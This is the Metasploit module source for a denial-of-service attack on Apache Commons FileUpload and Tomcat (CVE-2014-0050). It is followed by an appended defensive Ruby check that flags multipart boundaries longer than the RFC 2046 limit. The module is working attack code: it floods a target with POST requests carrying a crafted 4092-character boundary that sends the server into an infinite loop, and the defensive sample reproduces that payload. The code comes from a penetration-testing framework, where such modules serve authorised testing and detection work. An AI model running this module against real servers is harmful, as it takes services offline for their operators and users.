GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'Apache Commons FileUpload and Apache Tomcat DoS',
      'Description'     => %q{
        This module triggers an infinite loop in Apache Commons FileUpload 1.0
        through 1.3 via a specially crafted Content-Type header.
        Apache Tomcat 7 and Apache Tomcat 8 use a copy of FileUpload to handle
        mime-multipart requests, therefore, Apache Tomcat 7.0.0 through 7.0.50
        and 8.0.0-RC1 through 8.0.1 are affected by this issue. Tomcat 6 also
        uses Commons FileUpload as part of the Manager application.
      },
      'Author'          =>
        [
          'Unknown', # This issue was reported to the Apache Software Foundation and accidentally made public.
          'ribeirux' # metasploit module
        ],
      'License'         => MSF_LICENSE,
      'References'      =>
        [
          ['CVE', '2014-0050'],
          ['URL', 'https://tomcat.apache.org/security-8.html'],
          ['URL', 'https://tomcat.apache.org/security-7.html']
        ],
      'DisclosureDate' => '2014-02-06'
    ))

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('TARGETURI', [ true, "The request URI", '/']),
        OptInt.new('RLIMIT', [ true, "Number of requests to send",50])
      ])
  end

  def run
    boundary = "0"*4092
    opts = {
      'method'  => "POST",
      'uri'     => normalize_uri(target_uri.to_s),
      'ctype'   => "multipart/form-data; boundary=#{boundary}",
      'data'    => "#{boundary}00000",
      'headers' => {
        'Accept' => '*/*'
      }
    }

    # XXX: There is rarely, if ever, a need for a 'for' loop in Ruby
    # This should be rewritten with 1.upto() or Enumerable#each or
    # something
    for x in 1..datastore['RLIMIT']
      print_status("Sending request #{x} to #{peer}")
      begin
        c = connect
        r = c.request_cgi(opts)
        c.send_request(r)
        # Don't wait for a response
      rescue ::Rex::ConnectionError => exception
        print_error("Unable to connect: '#{exception.message}'")
        return
      ensure
        disconnect(c) if c
      end
    end
  end
end
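
Added example, not part of the Metasploit module or the metasploit-framework repository: a defender-side check that flags the Content-Type pattern this module sends, for use in front of servers still in the affected version ranges listed in the description. It relies on the RFC 2046 rule that a multipart boundary is at most 70 characters; the function names and sample requests are constructed for illustration.

```ruby
# Defensive check for oversized multipart boundaries (CVE-2014-0050 pattern).
# RFC 2046 limits a multipart boundary to 70 characters.
RFC2046_MAX_BOUNDARY = 70

# Return the boundary parameter of a Content-Type value, or nil if absent.
# Handles both quoted and unquoted parameter values.
def multipart_boundary(content_type)
  m = content_type.match(/;\s*boundary\s*=\s*(?:"([^"]*)"|([^;\s]*))/i)
  m && (m[1] || m[2])
end

# Classify one Content-Type header value.
def classify_content_type(content_type)
  value = content_type.to_s.strip
  return :not_multipart unless value.match?(%r{\Amultipart/}i)

  boundary = multipart_boundary(value)
  return :missing_boundary if boundary.nil? || boundary.empty?
  return :oversized_boundary if boundary.length > RFC2046_MAX_BOUNDARY

  :ok
end

# Constructed sample requests; id 2 mirrors the 4092-character boundary
# built in the module's run method.
SAMPLE_REQUESTS = [
  { id: 1, ctype: 'multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW' },
  { id: 2, ctype: "multipart/form-data; boundary=#{'0' * 4092}" },
  { id: 3, ctype: 'application/json' },
  { id: 4, ctype: 'multipart/form-data; charset=utf-8; boundary="simple boundary"' },
  { id: 5, ctype: 'multipart/form-data' }
].freeze

# Return [id, verdict] pairs for requests a filter should reject or log.
def suspicious_requests(requests)
  requests.map { |r| [r[:id], classify_content_type(r[:ctype])] }
          .reject { |_id, verdict| %i[ok not_multipart].include?(verdict) }
end

if __FILE__ == $PROGRAM_NAME
  suspicious_requests(SAMPLE_REQUESTS).each do |id, verdict|
    puts "request #{id}: #{verdict}"
  end
end
```

The same length test can be expressed as a reverse-proxy or WAF rule on the Content-Type header when the backend cannot be upgraded immediately.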